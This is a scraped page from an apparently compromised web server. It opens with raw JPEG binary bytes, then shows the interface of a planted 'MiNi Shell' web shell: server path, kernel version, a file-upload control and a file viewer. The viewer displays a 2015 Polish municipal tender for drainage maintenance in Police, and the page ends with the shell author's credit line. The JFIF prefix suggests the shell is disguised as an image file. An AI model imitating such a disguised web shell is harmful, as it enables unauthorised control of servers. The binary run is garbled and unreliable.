JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150416/86892-N-2015.html

<p class="kh_header"><b>Police: Konserwacja urządzeń melioracji wodnych szczegółowych</b><br>
<b>Numer ogłoszenia: 86892 - 2015; data zamieszczenia: 16.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Policach , ul. Stefana Batorego 3, 72-010 Police, woj. zachodniopomorskie, tel. 91 4311830, faks 91 4311832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.police.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja urządzeń melioracji wodnych szczegółowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BURMISTRZ  POLIC
                                          ul. Stefana  Batorego 3 
					      72 - 010   Police

    ogłasza  przetarg nieograniczony na wykonanie usługi:

              KONSERWACJA URZĄDZEŃ MELIORACJI WODNYCH SZCZEGÓŁOWYCH 


1. Zamawiający: Gmina Police, z siedzibą w  Policach przy  ul. Stefana Batorego 3, 
72-010 Police, tel. (91)  4 311 830,  fax  4 311 832. Prowadzący postępowanie: Wydział Gospodarki Gruntami.
2. Tryb udzielenia zamówienia:  Przetarg nieograniczony.
3. Adres strony internetowej, na której będzie Specyfikacja Istotnych Warunków 
 Zamówienia: www.bip.police.pl 
4. Przedmiot zamówienia: konserwacja urządzeń melioracji wodnych szczegółowych    obejmująca:
1) wykoszenie porostów ze skarp rowów, koron i skarp nasypów lub dna cieku/rowu dla porostu  gęstego twardego z wygrabieniem,
2) ręczne ścinanie krzaków gęstych ze spaleniem na miejscu,   
3) wydobycie z cieku porostów roślin korzeniących się w dnie (hakowanie) przy zarośnięciu powierzchni lustra wody powyżej 60%,
4) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,4 m przy grubości  warstwy namułu 20 cm z rozplantowaniem wydobytego urobku,
5) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,6 m przy grubości warstwy namułu 20 cm z rozplantowaniem wydobytego urobku,
6) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,8 m przy grubości warstwy namułu  20 cm z rozplantowaniem wydobytego urobku,
7) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości  dna 0,4 m przy grubości warstwy namułu 30 cm z rozplantowaniem wydobytego urobku,
8) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,6 m przy grubości  warstwy namułu 30 cm z rozplantowaniem wydobytego urobku,
9) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,8 m przy grubości warstwy namułu 30 cm z rozplantowaniem wydobytego urobku,
10) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,4 m przy grubości warstwy namułu 40 cm z rozplantowaniem wydobytego urobku,
11) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,6 m przy grubości warstwy namułu 40 cm - z rozplantowaniem wydobytego urobku,
12) ręczne usuwanie namułu z cieków o głębokości do 1,0 m szerokości dna 0,8 m przy grubości warstwy namułu 40 cm - z rozplantowaniem wydobytego urobku,
13) ręczne usuwanie namułu z cieków o głębokości do 1,5 m szerokości dna 0,4 m przy grubości warstwy namułu 20 cm z rozplantowaniem wydobytego urobku,
14) ręczne usuwanie namułu z cieków o głębokości do 1,5 m szerokości dna 0,6 m przy grubości warstwy namułu 20 cm z rozplantowaniem wydobytego urobku,
15) ręczne usuwanie namułu z cieków o głębokości do 1,5 m szerokości dna 0,8 m przy grubości warstwy namułu 20 cm z rozplantowaniem wydobytego urobku,
16) ręczne usuwanie namułu z cieków o głębokości do 1,5 m szerokości dna 0,4 m przy grubości warstwy namułu 30 cm z rozplantowaniem wydobytego urobku,
17) ręczne usuwanie namułu z cieków o głębokości  do 1,5 m szerokości dna 0,6 m przy grubości warstwy namułu 30 cm z rozplantowaniem wydobytego urobku,
18) ręczne usuwanie namułu z cieków o głębokości  do 1,5 m szerokości dna 0,8 m przy grubości   warstwy namułu 30 cm z rozplantowaniem wydobytego urobku,
19) ręczne usuwanie namułu z cieków  o głębokości do 1,5 m szerokości dna 0,4 m przy grubości warstwy namułu 40 cm z rozplantowaniem wydobytego urobku,
20) ręczne usuwanie namułu z cieków o głębokości do 1,5 m szerokości dna 0,6 m przy grubości warstwy namułu 40 cm z rozplantowaniem wydobytego urobku,
21) ręczne usuwanie namułu z cieków o głębokości do 1,5 m szerokości dna 0,8 m przy grubości warstwy namułu 40 cm z rozplantowaniem wydobytego urobku,
22) oczyszczenie  z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości 1/3 średnicy i średnicy przepustu 40 cm,
23) oczyszczenie z namułu  przepustów rurowych przy głębokości zamulenia  przewodu do wysokości 1/3 średnicy i średnicy przepustu 60 cm,
24) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia  przewodu do wysokości  1/3 średnicy i średnicy przepustu 80 cm,
25) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości 1/3 średnicy i średnicy przepustu 1.0 m,
26) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości  jedna druga średnicy i średnicy przepustu 40 cm,
27) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości jedna druga średnicy i średnicy przepustu 60 cm,
28) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości jedna druga średnicy i średnicy przepustu 80 cm,
29) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości jedna druga średnicy i średnicy przepustu  1,0 m,
30) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia przewodu do wysokości dwie trzecie średnicy i średnicy przepustu 0,4 m,
31) oczyszczenie z namułu przepustów rurowych przy głębokości zamulenia  przewodu do wysokości dwie trzecie średnicy i średnicy przepustu 0,6 m,
32) oczyszczenie z namułu przepustów  rurowych przy głębokości zamulenia przewodu do wysokości dwie trzecie średnicy i średnicy przepustu 0,8 m,
33) oczyszczenie z namułu studzienek drenarskich o średnicy 0,8 m i głębokości zamulenia 50  cm,
34) oczyszczenie z namułu studzienek drenarskich o średnicy 1,0 m i głębokości zamulenia 50 cm,
35) wykopy ręczne rowów melioracyjnych szerokość dna do 1.0 m, nachylenie skarp 1:1, 1:1,5, 1:2, grunt kat. III, głębokość do 1.0 m wraz z rozplantowaniem ziemi wydobytej z wykopu przy objętości do 1m3 na mb wykopu,
36) plantowanie skarp rowów, grunt kat. III,
37) wykonanie opasek z kiszek faszynowych o 20 cm, grunt. kat.III,
38) wykopy liniowe o ścianach pionowych pod rurociągi kat. gruntu III, głębokość do 1.5m,
39) roboty pomiarowe przy liniowych robotach ziemnych na trasie rowów melioracyjnych  w terenie równinnym,
40) odbudowa rurociągu - przepustu PVC typu (PRAGMA) średnicy 315 mm z przyczółkami z darniny na mur z zasypaniem wykopu materiałem zasypowym o objętości do 1.5m3/mb wraz z zagęszczeniem,
41) odbudowa rurociągu-przepustu PVC o 500 mm typu (PRAGMA) (rura - materiał zamawiającego) z przyczółkami z darniny na mur z zasypaniem materiałem zasypowym o objętości do 1,5 m3/mb wraz z zagęszczeniem,
42) demontaż rurociągu betonowego o 500 mm z recyklingiem wydobytego materiału,
43) utwardzenie nawierzchni nad przepustem gruzem drobnowymiarowym o frakcji 0,5-35 mm  warstwą o grubości 20 cm z zagęszczeniem na drogach gruntowych,
44) roboty rozbiórkowe warstw nawierzchni drogi  z recyklingiem wydobytego materiału,
45) odtworzenie korpusu drogi według istniejącego przekroju.
5. Zamawiający nie dopuszcza możliwości  składania ofert  częściowych.
6. Zamawiający  nie dopuszcza możliwości składania ofert wariantowych.
7. Przedmiot zamówienia należy zrealizować  w nieprzekraczalnym terminie do dnia:   16 listopada 2015r.
8. Udział w zamówieniu wymaga złożenia pisemnej oferty wg wzoru zał. nr 2 SIWZ w 
zamkniętej kopercie w sekretariacie (pokój nr 30) Urzędu Miejskiego w Policach ul. Stefana Batorego 3, w terminie do 04 maja  2015r., do godziny 10.00.
 8.1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone  w art. 22 ust.1 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy, a także wykazania należytego wykonania w ciągu ostatnich 3 lat (lub w okresie krótszym jeżeli  okres działalności jest krótszy) co najmniej 3 robót odpowiadających rodzajem i  wartością  przedmiotowi zamówienia o łącznej długości minimum 5 km każda. Zamawiający dokona oceny na zasadzie: spełnia, nie spełnia. Nie spełnienie choćby jednego warunku spowoduje wykluczenie i odrzucenie oferty. 
9. W przetargu stosuje się wadium.
10. Kryteria oceny ofert : cena wykonania zamówienia 100%.
11.Termin związania  z ofertą: 30 dni. Bieg terminu rozpoczyna się z upływem terminu składania  ofert.
12. Otwarcie ofert odbędzie się dnia 04 maja 2015r. o godzinie 10.30 w siedzibie Urzędu Miejskiego w Policach przy ul. Bankowej 18, w sali nr 201 w obecności Wykonawców.
13. SIWZ można odebrać (nieodpłatnie)  w siedzibie Zamawiającego pokój 217 przy ul. Bankowej 18 w Policach w godzinach 9.00-14.00. Adres strony internetowej na której zamieszczona jest Specyfikacja Istotnych Warunków Zamówienia: www.police.pl
14. Osobami uprawnionymi do kontaktowania się  z Wykonawcami są: Józef Błażewicz, Genowefa Nowicka-Murawska. Tel. (91) 4 311 897..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Przystępując do niniejszego postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2.000 zł (słownie dwa tysiące złotych).
2.Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust.6 ustawy, tj.:
1) pieniądzu,
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
3)  gwarancjach bankowych,
4)  gwarancjach ubezpieczeniowych,
5)  poręczeniach udzielanych przez podmioty o których mowa w art.6b ust. 5 , pkt.2 
ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2007r. Nr 42, poz. 275).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy Gminy Police  numer:15 1240 3927 1111 0010 6013 0076 prowadzony przez Bank Pekao SA II/O Szczecin z oznaczeniem Wadium przetargowe-Konserwacja urządzeń melioracji wodnych szczegółowych
5.  W przypadku wadium wnoszonego  w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku bankowym Zamawiającego.
6.  Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust.1 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 ustawy.
Spełnienie warunków udziału odnoszących się do posiadania wiedzy i doświadczenia, dysponowania osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej    i ekonomicznej zostanie ocenione według poniższych zasad:
1) udokumentowane należyte wykonanie, w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie minimum 3  robót  odpowiadających rodzajem i wartością przedmiotowi zamówienia  o łącznej długości minimum 5 km każda. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z normami i wiedzą techniczną oraz  prawidłowo ukończone (referencje, protokóły odbioru robót, itp.).
2) ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia przy wartości sumy ubezpieczenia nie niższej niż 100 tys.zł
2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły
spełnia-nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
3. Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane  usługi lub roboty wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.police.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Policach ul.Bankowa 18,Ii piętro, pokój nr 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2015 godzina 10:00, miejsce: Urząd Miejski w Policach ul.Stefana Batorego 3, pokój 30 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com